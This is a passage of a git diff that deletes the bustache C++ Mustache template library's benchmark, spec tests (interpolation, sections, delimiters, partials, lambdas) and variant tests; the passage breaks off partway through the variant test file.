-        {"empty", false},
-        {"count", lambda{[&n]() -> node { return ++n; }}},
-        {"array", array{1, 2, 3}},
-        {"a", map{{"b", map{{"c", true}}}}},
-        {"comments",
-            array
-            {
-                map
-                {
-                    {"name", "Joe"s},
-                    {"body", "<html> should be escaped"s}
-                },
-                map
-                {
-                    {"name", "Sam"s},
-                    {"body", "{{mustache}} can be seen"s}
-                },
-                map
-                {
-                    {"name", "New"s},
-                    {"body", "break\nup"s}
-                }
-            }
-        }
-    };
-
-    while (state.KeepRunning())
-    {
-        n = 0;
-        render(tmp, data, context);
-    }
-}
-
-static void kainjow_usage(benchmark::State& state)
-{
-    using namespace Kainjow;
-    using Data = Mustache::Data;
-
-    int n = 0;
-    Data data;
-    data.set("header", "Colors");
-    {
-        Data d1, d2, d3;
-        d1.set("name", "red");
-        d1.set("first", Data::Type::True);
-        d1.set("url", "#Red");
-        d2.set("name", "green");
-        d2.set("link", Data::Type::True);
-        d2.set("url", "#Green");
-        d3.set("name", "blue");
-        d3.set("link", Data::Type::True);
-        d3.set("url", "#Blue");
-        data.set("items", Data::ListType{d1, d2, d3});
-    }
-    data.set("empty", Data::Type::False);
-    data.set("count", Data::LambdaType{[&n](const std::string&) { return std::to_string(++n); }});
-    data.set("array", Data::ListType{"1", "2", "3"});
-    data.set("a", {"b",{"c", "true"}});
-    {
-        Data d1, d2, d3;
-        d1.set("name", "Joe");
-        d1.set("body", "<html> should be escaped");
-        d2.set("name", "Sam");
-        d2.set("body", "{{mustache}} can be seen");
-        d3.set("name", "New");
-        d3.set("body", "break\nup");
-        data.set("comments", Data::ListType{d1, d2, d3});
-    }
-    data.set("href", Data::PartialType{[]() { return "href=\"{{url}}\""; }});
-
-    Mustache fmt(tmp);
-
-    while (state.KeepRunning())
-    {
-        n = 0;
-        fmt.render(data);
-    }
-}
-
-BENCHMARK(bustache_usage);
-BENCHMARK(mstch_usage);
-BENCHMARK(kainjow_usage);
-
-BENCHMARK_MAIN();
\ No newline at end of file
diff --git a/thirdparty/bustache/test/specs.cpp b/thirdparty/bustache/test/specs.cpp
deleted file mode 100644
index 617ed1d..0000000
--- a/thirdparty/bustache/test/specs.cpp
+++ /dev/null
@@ -1,714 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#define CATCH_CONFIG_MAIN
-#include <catch.hpp>
-#include <bustache/model.hpp>
-#include <boost/unordered_map.hpp>
-
-using namespace bustache;
-using context = boost::unordered_map<std::string, format>;
-
-TEST_CASE("interpolation")
-{
-    object const empty;
-
-    // No Interpolation
-    CHECK(to_string("Hello from {Mustache}!"_fmt(empty)) == "Hello from {Mustache}!");
-
-    // Basic Interpolation
-    CHECK(to_string("Hello, {{subject}}!"_fmt(object{{"subject", "world"}})) == "Hello, world!");
-
-    // HTML Escaping
-    CHECK(to_string("These characters should be HTML escaped: {{forbidden}}"_fmt(object{{"forbidden", "& \" < >"}}, escape_html))
-        == "These characters should be HTML escaped: &amp; &quot; &lt; &gt;");
-
-    // Triple Mustache
-    CHECK(to_string("These characters should not be HTML escaped: {{{forbidden}}}"_fmt(object{{"forbidden", "& \" < >"}}, escape_html))
-        == "These characters should not be HTML escaped: & \" < >");
-
-    // Ampersand
-    CHECK(to_string("These characters should not be HTML escaped: {{&forbidden}}"_fmt(object{{"forbidden", "& \" < >"}}, escape_html))
-        == "These characters should not be HTML escaped: & \" < >");
-
-    // Basic Integer Interpolation
-    CHECK(to_string(R"("{{mph}} miles an hour!")"_fmt(object{{"mph", 85}})) == R"("85 miles an hour!")");
-
-    // Triple Mustache Integer Interpolation
-    CHECK(to_string(R"("{{{mph}}} miles an hour!")"_fmt(object{{"mph", 85}})) == R"("85 miles an hour!")");
-
-    // Ampersand Integer Interpolation
-    CHECK(to_string(R"("{{&mph}} miles an hour!")"_fmt(object{{"mph", 85}})) == R"("85 miles an hour!")");
-
-    // Basic Decimal Interpolation
-    CHECK(to_string(R"("{{power}} jiggawatts!")"_fmt(object{{"power", 1.21}})) == R"("1.21 jiggawatts!")");
-
-    // Triple Decimal Interpolation
-    CHECK(to_string(R"("{{{power}}} jiggawatts!")"_fmt(object{{"power", 1.21}})) == R"("1.21 jiggawatts!")");
-
-    // Ampersand Decimal Interpolation
-    CHECK(to_string(R"("{{&power}} jiggawatts!")"_fmt(object{{"power", 1.21}})) == R"("1.21 jiggawatts!")");
-
-    // Context Misses
-    {
-        // Basic Context Miss Interpolation
-        CHECK(to_string("I ({{cannot}}) be seen!"_fmt(empty)) == "I () be seen!");
-
-        // Triple Mustache Context Miss Interpolation
-        CHECK(to_string("I ({{{cannot}}}) be seen!"_fmt(empty)) == "I () be seen!");
-
-        // Ampersand Context Miss Interpolation
-        CHECK(to_string("I ({{&cannot}}) be seen!"_fmt(empty)) == "I () be seen!");
-    }
-
-    // Dotted Names
-    {
-        // Dotted Names - Basic Interpolation
-        CHECK(to_string(R"("{{person.name}}" == "{{#person}}{{name}}{{/person}}")"_fmt(object{{"person", object{{"name", "Joe"}}}})) == R"("Joe" == "Joe")");
-
-        // Dotted Names - Triple Mustache Interpolation
-        CHECK(to_string(R"("{{{person.name}}}" == "{{#person}}{{name}}{{/person}}")"_fmt(object{{"person", object{{"name", "Joe"}}}})) == R"("Joe" == "Joe")");
-
-        // Dotted Names - Ampersand Interpolation
-        CHECK(to_string(R"("{{&person.name}}" == "{{#person}}{{name}}{{/person}}")"_fmt(object{{"person", object{{"name", "Joe"}}}})) == R"("Joe" == "Joe")");
-
-        // Dotted Names - Arbitrary Depth
-        CHECK(to_string(R"("{{a.b.c.d.e.name}}" == "Phil")"_fmt(
-            object{{"a", object{{"b", object{{"c", object{{"d", object{{"e", object{{"name", "Phil"}}}}}}}}}}}}))
-            == R"("Phil" == "Phil")");
-
-        // Dotted Names - Broken Chains
-        CHECK(to_string(R"("{{a.b.c}}" == "")"_fmt(empty)) == R"("" == "")");
-
-        // Dotted Names - Broken Chain Resolution
-        CHECK(to_string(R"("{{a.b.c.name}}" == "")"_fmt(
-            object{
-                {"a", object{{"b", empty}}},
-                {"c", object{{"name", "Jim"}}}
-            })) == R"("" == "")");
-
-        // Dotted Names - Initial Resolution
-        CHECK(to_string(R"("{{#a}}{{b.c.d.e.name}}{{/a}}" == "Phil")"_fmt(
-            object{
-                {"a", object{{"b", object{{"c", object{{"d", object{{"e", object{{"name", "Phil"}}}}}}}}}}},
-                {"c", object{{"c", object{{"d", object{{"e", object{{"name", "Wrong"}}}}}}}}}
-        })) == R"("Phil" == "Phil")");
-
-        // Dotted Names - Context Precedence
-        CHECK(to_string("{{#a}}{{b.c}}{{/a}}"_fmt(object{{"b", empty}, {"c", "ERROR"}})) == "");
-    }
-
-    object s{{"string", "---"}};
-
-    // Whitespace Sensitivity
-    {
-        // Interpolation - Surrounding Whitespace
-        CHECK(to_string("| {{string}} |"_fmt(s)) == "| --- |");
-
-        // Triple Mustache - Surrounding Whitespace
-        CHECK(to_string("| {{{string}}} |"_fmt(s)) == "| --- |");
-
-        // Ampersand - Surrounding Whitespace
-        CHECK(to_string("| {{&string}} |"_fmt(s)) == "| --- |");
-
-        // Interpolation - Standalone
-        CHECK(to_string("  {{string}}\n"_fmt(s)) == "  ---\n");
-
-        // Triple Mustache - Standalone
-        CHECK(to_string("  {{{string}}}\n"_fmt(s)) == "  ---\n");
-
-        // Ampersand - Standalone
-        CHECK(to_string("  {{&string}}\n"_fmt(s)) == "  ---\n");
-    }
-
-    // Whitespace Insensitivity
-    {
-        // Interpolation With Padding
-        CHECK(to_string("|{{ string }}|"_fmt(s)) == "|---|");
-
-        // Triple Mustache With Padding
-        CHECK(to_string("|{{{ string }}}|"_fmt(s)) == "|---|");
-
-        // Ampersand With Padding
-        CHECK(to_string("|{{& string }}|"_fmt(s)) == "|---|");
-    }
-}
-
-TEST_CASE("sections")
-{
-    object const empty;
-
-    // Truthy
-    CHECK(to_string(R"("{{#boolean}}This should be rendered.{{/boolean}}")"_fmt(object{{"boolean", true}}))
-        == R"("This should be rendered.")");
-
-    // Falsey
-    CHECK(to_string(R"("{{#boolean}}This should not be rendered.{{/boolean}}")"_fmt(object{{"boolean", false}}))
-        == R"("")");
-
-    // Context
-    CHECK(to_string(R"("{{#context}}Hi {{name}}.{{/context}}")"_fmt(object{{"context", object{{"name", "Joe"}}}}))
-        == R"("Hi Joe.")");
-
-    // Deeply Nested Contexts
-    CHECK(to_string(
-        "{{#a}}\n"
-        "{{one}}\n"
-        "{{#b}}\n"
-        "{{one}}{{two}}{{one}}\n"
-        "{{#c}}\n"
-        "{{one}}{{two}}{{three}}{{two}}{{one}}\n"
-        "{{#d}}\n"
-        "{{one}}{{two}}{{three}}{{four}}{{three}}{{two}}{{one}}\n"
-        "{{#e}}\n"
-        "{{one}}{{two}}{{three}}{{four}}{{five}}{{four}}{{three}}{{two}}{{one}}\n"
-        "{{/e}}\n"
-        "{{one}}{{two}}{{three}}{{four}}{{three}}{{two}}{{one}}\n"
-        "{{/d}}\n"
-        "{{one}}{{two}}{{three}}{{two}}{{one}}\n"
-        "{{/c}}\n"
-        "{{one}}{{two}}{{one}}\n"
-        "{{/b}}\n"
-        "{{one}}\n"
-        "{{/a}}"_fmt(object{
-            {"a", object{{"one", 1}}},
-            {"b", object{{"two", 2}}},
-            {"c", object{{"three", 3}}},
-            {"d", object{{"four", 4}}},
-            {"e", object{{"five", 5}}}}))
-        == 
-        "1\n"
-        "121\n"
-        "12321\n"
-        "1234321\n"
-        "123454321\n"
-        "1234321\n"
-        "12321\n"
-        "121\n"
-        "1\n");
-
-    // List
-    CHECK(to_string(R"("{{#list}}{{item}}{{/list}}")"_fmt(object{{"list", array{object{{"item", 1}}, object{{"item", 2}}, object{{"item", 3}}}}}))
-        == R"("123")");
-
-    // Empty List
-    CHECK(to_string(R"("{{#list}}Yay lists!{{/list}}")"_fmt(object{{"list", array{}}})) == R"("")");
-
-    // Doubled
-    CHECK(to_string(
-        "{{#bool}}\n"
-        "* first\n"
-        "{{/bool}}\n"
-        "* {{two}}\n"
-        "{{#bool}}\n"
-        "* third\n"
-        "{{/bool}}"_fmt(object{{"bool", true}, {"two", "second"}}))
-        == 
-        "* first\n"
-        "* second\n"
-        "* third\n");
-
-    // Nested (Truthy)
-    CHECK(to_string("| A {{#bool}}B {{#bool}}C{{/bool}} D{{/bool}} E |"_fmt(object{{"bool", true}})) == "| A B C D E |");
-
-    // Nested (Falsey)
-    CHECK(to_string("| A {{#bool}}B {{#bool}}C{{/bool}} D{{/bool}} E |"_fmt(object{{"bool", false}})) == "| A  E |");
-
-    // Context Misses
-    CHECK(to_string("[{{#missing}}Found key 'missing'!{{/missing}}]"_fmt(empty)) == "[]");
-
-    // Implicit Iterators
-    {
-        // Implicit Iterator - String
-        CHECK(to_string(R"#("{{#list}}({{.}}){{/list}}")#"_fmt(object{{"list", array{1, 2, 3, 4, 5}}})) == R"#("(1)(2)(3)(4)(5)")#");
-
-        // Implicit Iterator - Decimal
-        CHECK(to_string(R"#("{{#list}}({{.}}){{/list}}")#"_fmt(object{{"list", array{1.1, 2.2, 3.3, 4.4, 5.5}}})) == R"#("(1.1)(2.2)(3.3)(4.4)(5.5)")#");
-
-        // Implicit Iterator - Array
-        CHECK(to_string(R"#("{{#list}}({{#.}}{{.}}{{/.}}){{/list}}")#"_fmt(object{{"list", array{array{1, 2, 3}, array{"a", "b", "c"}}}})) == R"#("(123)(abc)")#");
-    }
-
-    // Dotted Names
-    {
-        // Dotted Names - Truthy
-        CHECK(to_string(R"("{{#a.b.c}}Here{{/a.b.c}}" == "Here")"_fmt(object{{"a", object{{"b", object{{"c", true}}}}}})) == R"("Here" == "Here")");
-
-        // Dotted Names - Falsey
-        CHECK(to_string(R"("{{#a.b.c}}Here{{/a.b.c}}" == "")"_fmt(object{{"a", object{{"b", object{{"c", false}}}}}})) == R"("" == "")");
-
-        // Dotted Names - Broken Chains
-        CHECK(to_string(R"("{{#a.b.c}}Here{{/a.b.c}}" == "")"_fmt(object{{"a", empty}})) == R"("" == "")");
-    }
-
-    object const o{{"boolean", true}};
-
-    // Whitespace Sensitivity
-    {
-        // Surrounding Whitespace
-        CHECK(to_string(" | {{#boolean}}\t|\t{{/boolean}} | \n"_fmt(o)) == " | \t|\t | \n");
-
-        // Internal Whitespace
-        CHECK(to_string(" | {{#boolean}} {{! Important Whitespace }}\n {{/boolean}} | \n"_fmt(o)) == " |  \n  | \n");
-
-        // Indented Inline Sections
-        CHECK(to_string(" {{#boolean}}YES{{/boolean}}\n {{#boolean}}GOOD{{/boolean}}\n"_fmt(o)) == " YES\n GOOD\n");
-
-        // Standalone Lines
-        CHECK(to_string(
-            "| This Is\n"
-            "{{#boolean}}\n"
-            "|\n"
-            "{{/boolean}}\n"
-            "| A Line"_fmt(o))
-            ==
-            "| This Is\n"
-            "|\n"
-            "| A Line");
-
-        // Indented Standalone Lines
-        CHECK(to_string(
-            "| This Is\n"
-            "  {{#boolean}}\n"
-            "|\n"
-            "  {{/boolean}}\n"
-            "| A Line"_fmt(o))
-            ==
-            "| This Is\n"
-            "|\n"
-            "| A Line");
-
-        //  Standalone Line Endings
-        CHECK(to_string("|\r\n{{#boolean}}\r\n{{/boolean}}\r\n|"_fmt(o)) == "|\r\n|");
-
-        // Standalone Without Previous Line
-        CHECK(to_string("  {{#boolean}}\n#{{/boolean}}\n/"_fmt(o)) == "#\n/");
-
-        // Standalone Without Newline
-        CHECK(to_string("#{{#boolean}}\n/\n  {{/boolean}}"_fmt(o)) == "#\n/\n");
-    }
-
-    // Whitespace Insensitivity
-    {
-        CHECK(to_string("|{{# boolean }}={{/ boolean }}|"_fmt(o)) == "|=|");
-    }
-}
-
-TEST_CASE("inverted")
-{
-    object const empty;
-
-    // Falsey
-    CHECK(to_string(R"("{{^boolean}}This should be rendered.{{/boolean}}")"_fmt(object{{"boolean", false}})) == R"("This should be rendered.")");
-
-    // Truthy
-    CHECK(to_string(R"("{{^boolean}}This should not be rendered.{{/boolean}}")"_fmt(object{{"boolean", true}})) == R"("")");
-
-    // Context
-    CHECK(to_string(R"("{{^context}}Hi {{name}}.{{/context}}")"_fmt(object{{"context", object{{"name", "Joe"}}}})) == R"("")");
-
-    // List
-    CHECK(to_string(R"("{{^list}}{{n}}{{/list}}")"_fmt(object{{"list", array{object{{"n", 1}}, object{{"n", 2}}, object{{"n", 3}}}}})) == R"("")");
-
-    // Empty List
-    CHECK(to_string(R"("{{^list}}Yay lists!{{/list}}")"_fmt(object{{"list", array{}}})) == R"("Yay lists!")");
-
-    // Doubled
-    CHECK(to_string(
-        "{{^bool}}\n"
-        "* first\n"
-        "{{/bool}}\n"
-        "* {{two}}\n"
-        "{{^bool}}\n"
-        "* third\n"
-        "{{/bool}}"_fmt(object{{"bool", false}, {"two", "second"}}))
-        ==
-        "* first\n"
-        "* second\n"
-        "* third\n");
-
-    // Nested (Falsey)
-    CHECK(to_string("| A {{^bool}}B {{^bool}}C{{/bool}} D{{/bool}} E |"_fmt(object{{"bool", false}})) == "| A B C D E |");
-
-    // Nested (Truthy)
-    CHECK(to_string("| A {{^bool}}B {{^bool}}C{{/bool}} D{{/bool}} E |"_fmt(object{{"bool", true}})) == "| A  E |");
-
-    // Context Misses
-    CHECK(to_string("[{{^missing}}Cannot find key 'missing'!{{/missing}}]"_fmt(empty)) == "[Cannot find key 'missing'!]");
-
-    // Dotted Names
-    {
-        // Dotted Names - Truthy
-        CHECK(to_string(R"("{{^a.b.c}}Not Here{{/a.b.c}}" == "")"_fmt(object{{"a", object{{"b", object{{"c", true}}}}}})) == R"("" == "")");
-
-        // Dotted Names - Falsey
-        CHECK(to_string(R"("{{^a.b.c}}Not Here{{/a.b.c}}" == "Not Here")"_fmt(object{{"a", object{{"b", object{{"c", false}}}}}})) == R"("Not Here" == "Not Here")");
-
-        // Dotted Names - Broken Chains
-        CHECK(to_string(R"("{{^a.b.c}}Not Here{{/a.b.c}}" == "Not Here")"_fmt(object{{"a", empty}})) == R"("Not Here" == "Not Here")");
-    }
-
-    object const o{{"boolean", false}};
-
-    // Whitespace Sensitivity
-    {
-        // Surrounding Whitespace
-        CHECK(to_string(" | {{^boolean}}\t|\t{{/boolean}} | \n"_fmt(o)) == " | \t|\t | \n");
-
-        // Internal Whitespace
-        CHECK(to_string(" | {{^boolean}} {{! Important Whitespace }}\n {{/boolean}} | \n"_fmt(o)) == " |  \n  | \n");
-
-        // Indented Inline Sections
-        CHECK(to_string(" {{^boolean}}YES{{/boolean}}\n {{^boolean}}GOOD{{/boolean}}\n"_fmt(o)) == " YES\n GOOD\n");
-
-        // Standalone Lines
-        CHECK(to_string(
-            "| This Is\n"
-            "{{^boolean}}\n"
-            "|\n"
-            "{{/boolean}}\n"
-            "| A Line"_fmt(o))
-            ==
-            "| This Is\n"
-            "|\n"
-            "| A Line");
-
-        // Indented Standalone Lines
-        CHECK(to_string(
-            "| This Is\n"
-            "  {{^boolean}}\n"
-            "|\n"
-            "  {{/boolean}}\n"
-            "| A Line"_fmt(o))
-            ==
-            "| This Is\n"
-            "|\n"
-            "| A Line");
-
-        //  Standalone Line Endings
-        CHECK(to_string("|\r\n{{^boolean}}\r\n{{/boolean}}\r\n|"_fmt(o)) == "|\r\n|");
-
-        // Standalone Without Previous Line
-        CHECK(to_string("  {{^boolean}}\n#{{/boolean}}\n/"_fmt(o)) == "#\n/");
-
-        // Standalone Without Newline
-        CHECK(to_string("#{{^boolean}}\n/\n  {{/boolean}}"_fmt(o)) == "#\n/\n");
-    }
-
-    // Whitespace Insensitivity
-    {
-        CHECK(to_string("|{{^ boolean }}={{/ boolean }}|"_fmt(o)) == "|=|");
-    }
-}
-
-TEST_CASE("delimiters")
-{
-    // Pair Behavior
-    CHECK(to_string("{{=<% %>=}}(<%text%>)"_fmt(object{{"text", "Hey!"}})) == "(Hey!)");
-
-    // Special Characters
-    CHECK(to_string("({{=[ ]=}}[text])"_fmt(object{{"text", "It worked!"}})) == "(It worked!)");
-
-    // Sections
-    CHECK(to_string(
-        "[\n"
-        "{{#section}}\n"
-        "  {{data}}\n"
-        "  |data|\n"
-        "{{/section}}\n"
-        "{{= | | =}}\n"
-        "|#section|\n"
-        "  {{data}}\n"
-        "  |data|\n"
-        "|/section|\n"
-        "]"_fmt(object{{"section", true}, {"data", "I got interpolated."}}))
-        == 
-        "[\n"
-        "  I got interpolated.\n"
-        "  |data|\n"
-        "  {{data}}\n"
-        "  I got interpolated.\n"
-        "]");
-
-    // Inverted Sections
-    CHECK(to_string(
-        "[\n"
-        "{{^section}}\n"
-        "  {{data}}\n"
-        "  |data|\n"
-        "{{/section}}\n"
-        "{{= | | =}}\n"
-        "|^section|\n"
-        "  {{data}}\n"
-        "  |data|\n"
-        "|/section|\n"
-        "]"_fmt(object{{"section", false},{"data", "I got interpolated."}}))
-        ==
-        "[\n"
-        "  I got interpolated.\n"
-        "  |data|\n"
-        "  {{data}}\n"
-        "  I got interpolated.\n"
-        "]");
-
-    // Partial Inheritence
-    CHECK(to_string(
-        "[ {{>include}} ]\n"
-        "{{= | | =}}\n"
-        "[ |>include| ]"_fmt(object{{"value", "yes"}}, context{{"include", ".{{value}}."_fmt}}))
-        ==
-        "[ .yes. ]\n"
-        "[ .yes. ]");
-
-    // Post-Partial Behavior
-    CHECK(to_string(
-        "[ {{>include}} ]\n"
-        "[ .{{value}}.  .|value|. ]"_fmt(object{{"value", "yes"}}, context{{"include", ".{{value}}. {{= | | =}} .|value|."_fmt}}))
-        ==
-        "[ .yes.  .yes. ]\n"
-        "[ .yes.  .|value|. ]");
-
-    object const empty;
-
-    // Whitespace Sensitivity
-    {
-        // Surrounding Whitespace
-        CHECK(to_string("| {{=@ @=}} |"_fmt(empty)) == "|  |");
-
-        // Outlying Whitespace (Inline)
-        CHECK(to_string(" | {{=@ @=}}\n"_fmt(empty)) == " | \n");
-
-        // Standalone Tag
-        CHECK(to_string(
-            "Begin.\n"
-            "{{=@ @=}}\n"
-            "End."_fmt(empty))
-            == 
-            "Begin.\n"
-            "End.");
-
-        // Indented Standalone Tag
-        CHECK(to_string(
-            "Begin.\n"
-            "  {{=@ @=}}\n"
-            "End."_fmt(empty))
-            ==
-            "Begin.\n"
-            "End.");
-
-        // Standalone Line Endings
-        CHECK(to_string("|\r\n{{= @ @ =}}\r\n|"_fmt(empty)) == "|\r\n|");
-
-        // Standalone Without Previous Line
-        CHECK(to_string("  {{=@ @=}}\n="_fmt(empty)) == "=");
-
-        // Standalone Without Newline
-        CHECK(to_string("=\n  {{=@ @=}}"_fmt(empty)) == "=\n");
-    }
-
-    // Whitespace Insensitivity
-    {
-        // Pair with Padding
-        CHECK(to_string("|{{= @   @ =}}|"_fmt(empty)) == "||");
-    }
-}
-
-TEST_CASE("comments")
-{
-    object const empty;
-
-    // Inline
-    CHECK(to_string("12345{{! Comment Block! }}67890"_fmt(empty)) == "1234567890");
-
-    // Multiline
-    CHECK(to_string(
-        "12345{{!\n"
-        "  This is a\n"
-        "  multi-line comment...\n"
-        "}}67890"_fmt(empty))
-        == 
-        "1234567890");
-
-    // Standalone
-    CHECK(to_string(
-        "Begin.\n"
-        "{{! Comment Block! }}\n"
-        "End."_fmt(empty))
-        ==
-        "Begin.\n"
-        "End.");
-
-    // Indented Standalone
-    CHECK(to_string(
-        "Begin.\n"
-        "  {{! Comment Block! }}\n"
-        "End."_fmt(empty))
-        ==
-        "Begin.\n"
-        "End.");
-
-    // Standalone Line Endings
-    CHECK(to_string("|\r\n{{! Standalone Comment }}\r\n|"_fmt(empty)) == "|\r\n|");
-
-    // Standalone Without Previous Line
-    CHECK(to_string("  {{! I'm Still Standalone }}\n!"_fmt(empty)) == "!");
-
-    // Standalone Without Newline
-    CHECK(to_string("!\n  {{! I'm Still Standalone }}"_fmt(empty)) == "!\n");
-
-    // Multiline Standalone
-    CHECK(to_string(
-        "Begin.\n"
-        "{{!\n"
-        "Something's going on here...\n"
-        "}}\n"
-        "End."_fmt(empty))
-        ==
-        "Begin.\n"
-        "End.");
-
-    // Indented Multiline Standalone
-    CHECK(to_string(
-        "Begin.\n"
-        "  {{!\n"
-        "    Something's going on here...\n"
-        "  }}\n"
-        "End."_fmt(empty))
-        ==
-        "Begin.\n"
-        "End.");
-
-    // Indented Inline
-    CHECK(to_string("  12 {{! 34 }}\n"_fmt(empty)) == "  12 \n");
-
-    // Surrounding Whitespace
-    CHECK(to_string("12345 {{! Comment Block! }} 67890"_fmt(empty)) == "12345  67890");
-}
-
-TEST_CASE("partials")
-{
-    object const empty;
-
-    // Basic Behavior
-    CHECK(to_string(R"("{{>text}}")"_fmt(empty, context{{"text", "from partial"_fmt}})) == R"("from partial")");
-
-    // Failed Lookup
-    CHECK(to_string(R"("{{>text}}")"_fmt(empty)) == R"("")");
-
-    // Context
-    CHECK(to_string(R"("{{>partial}}")"_fmt(object{{"text", "content"}}, context{{"partial", "*{{text}}*"_fmt}})) == R"("*content*")");
-
-    // Recursion
-    CHECK(to_string("{{>node}}"_fmt(object{
-        {"content", "X"},
-        {"nodes", array{object{{"content", "Y"}, {"nodes", array{}}}}}
-    }, context{{"node", "{{content}}<{{#nodes}}{{>node}}{{/nodes}}>"_fmt}})) == "X<Y<>>");
-
-    // Whitespace Sensitivity
-    {
-        // Surrounding Whitespace
-        CHECK(to_string("| {{>partial}} |"_fmt(empty, context{{"partial", "\t|\t"_fmt}})) == "| \t|\t |");
-
-        // Inline Indentation
-        CHECK(to_string("  {{data}}  {{> partial}}\n"_fmt(object{{"data", "|"}}, context{{"partial", ">\n>"_fmt}})) == "  |  >\n>\n");
-
-        // Standalone Line Endings
-        CHECK(to_string("|\r\n{{>partial}}\r\n|"_fmt(empty, context{{"partial", ">"_fmt}})) == "|\r\n>|");
-
-        // Standalone Without Previous Line
-        CHECK(to_string("  {{>partial}}\n>"_fmt(empty, context{{"partial", ">\n>"_fmt}})) == "  >\n  >>");
-
-        // Standalone Without Newline
-        CHECK(to_string(">\n  {{>partial}}"_fmt(empty, context{{"partial", ">\n>"_fmt}})) == ">\n  >\n  >");
-
-        // Standalone Indentation
-        CHECK(to_string(
-            "\\\n"
-            " {{>partial}}\n"
-            "/"_fmt(object{{"content", "<\n->"}},
-                context{{"partial",
-                "|\n"
-                "{{{content}}}\n"
-                "|\n"_fmt}}))
-            == 
-            "\\\n"
-            " |\n"
-            " <\n"
-            "->\n"
-            " |\n"
-            "/");
-    }
-
-    // Whitespace Insensitivity
-    {
-        // Padding Whitespace
-        CHECK(to_string("|{{> partial }}|"_fmt(empty, context{{"partial", "[]"_fmt}})) == "|[]|");
-    }
-}
-
-TEST_CASE("lambdas")
-{
-    // Interpolation
-    CHECK(to_string("Hello, {{lambda}}!"_fmt(object{{"lambda", [] { return "world"; }}})) == "Hello, world!");
-
-    // Interpolation - Expansion
-    CHECK(to_string(
-        "Hello, {{lambda}}!"_fmt(object{
-            {"lambda", [] { return "{{planet}}"_fmt; }},
-            {"planet", "world"}}))
-        ==
-        "Hello, world!");
-
-    // Interpolation - Alternate Delimiters
-    CHECK(to_string(
-        "{{= | | =}}\nHello, (|&lambda|)!"_fmt(object{
-            {"lambda", [] { return "|planet| => {{planet}}"_fmt; }},
-            {"planet", "world"}}))
-        ==
-        "Hello, (|planet| => world)!");
-
-    // Interpolation - Multiple Calls
-    CHECK(to_string(
-        "{{lambda}} == {{{lambda}}} == {{lambda}}"_fmt(object{
-            {"lambda", [n = 0]() mutable { return ++n; }}}))
-        ==
-        "1 == 2 == 3");
-
-    // Escaping
-    CHECK(to_string("<{{lambda}}{{{lambda}}}"_fmt(object{{"lambda", [] { return ">"; }}}, escape_html)) == "<&gt;>");
-
-    // Section - Expansion
-    CHECK(to_string("<{{#lambda}}-{{/lambda}}>"_fmt(object{
-        {"lambda", [](ast::content_list const& contents) {
-            ast::content_list list;
-            list.insert(list.end(), contents.begin(), contents.end());
-            list.push_back(ast::variable{"planet"});
-            list.insert(list.end(), contents.begin(), contents.end());
-            return format(std::move(list), false);
-        }},
-        {"planet", "Earth"}}))
-        ==
-        "<-Earth->");
-
-    // Section - Multiple Calls
-    CHECK(to_string("{{#lambda}}FILE{{/lambda}} != {{#lambda}}LINE{{/lambda}}"_fmt(object{
-        {"lambda", [](ast::content_list const& contents) {
-            ast::content_list list;
-            list.push_back(ast::text("__"));
-            list.insert(list.end(), contents.begin(), contents.end());
-            list.push_back(ast::text("__"));
-            return format(std::move(list), false);
-        }}}))
-        ==
-        "__FILE__ != __LINE__");
-
-    // Inverted Section
-    CHECK(to_string("<{{^lambda}}{{static}}{{/lambda}}>"_fmt(object{
-        {"lambda", [](ast::content_list const&) { return false; }},
-        {"static", "static"}}))
-        ==
-        "<>");
-}
\ No newline at end of file
diff --git a/thirdparty/bustache/test/variant.cpp b/thirdparty/bustache/test/variant.cpp
deleted file mode 100644
index 9e04858..0000000
--- a/thirdparty/bustache/test/variant.cpp
+++ /dev/null
@@ -1,233 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016-2017 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#define CATCH_CONFIG_MAIN
-#include <catch.hpp>
-#include <bustache/detail/variant.hpp>
-
-struct BadCopyError {};
-
-struct BadCopy
-{
-    BadCopy() = default;
-
-    BadCopy(BadCopy&&) = default;
-
-    BadCopy(BadCopy const&)
-    {
-        throw BadCopyError();
-    }
-
-    BadCopy& operator=(BadCopy const&)
-    {
-        throw BadCopyError();
-    }
-
-    BadCopy& operator=(BadCopy&&) = default;
-};
-
-struct A
-{
-    A() = default;
-
-    A(A&& other) noexcept
-    {
-        other.moved = true;
-    }
-
-    A(A const&) = default;
-
-    A& operator=(A&& other) noexcept
-    {
-        assigned = true;
-        other.moved = true;
-        return *this;
-    }
-
-    A& operator=(A const& other) noexcept
-    {
-        assigned = true;
-        return *this;
-    }
-
-    bool assigned = false;
-    bool moved = false;
-};
-
-struct GoodInt
-{
-    operator int() const noexcept
-    {
-        return 0;
-    }
-};
-
-struct BadIntError {};
-
-struct BadInt
-{
-    operator int() const
-    {
-        throw BadIntError();
-    }
-};
-
-struct Visitor
-{
-    unsigned operator()(bool const&) const
-    {
-        return 0;
-    }
-
-    unsigned operator()(int const&) const
-    {
-        return 1;
-    }
-
-    unsigned operator()(A const&) const
-    {
-        return 2;
-    }
-
-    unsigned operator()(BadCopy const&) const
-    {
-        return 3;
-    }
-};
-
-namespace bustache
-{
-#define VAR(X, D)                                                               \
-    X(0, bool, D)                                                               \
-    X(1, int, D)                                                                \
-    X(2, A, D)                                                                  \
-    X(3, BadCopy, D)                                                            \
-/***/
-    class Var : public variant_base<Var>
-    {
-        VAR(Zz_BUSTACHE_VARIANT_MATCH,)
-    public:
-        Zz_BUSTACHE_VARIANT_DECL(Var, VAR, false)
-
-        Var() noexcept : _which(0), _0() {}
-    };
-#undef VAR
-}
-
-using namespace bustache;
-
-TEST_CASE("variant-ctor")
-{
-    {
-        Var v;
-        CHECK(v.valid());
-        CHECK(v.which() == 0);
-        Var v2(v);
-        CHECK(v.which() == 0);
-    }
-    {
-        Var v(true);
-        CHECK(v.valid());
-        CHECK(v.which() == 0);
-        Var v2(v);
-        CHECK(v.which() == 0);
-    }
-    {
-        Var v(0);
-        CHECK(v.valid());
-        CHECK(v.which() == 1);
-        Var v2(v);
-        CHECK(v.which() == 1);
-    }
-    {
-        Var v(A{});
-        CHECK(v.valid());
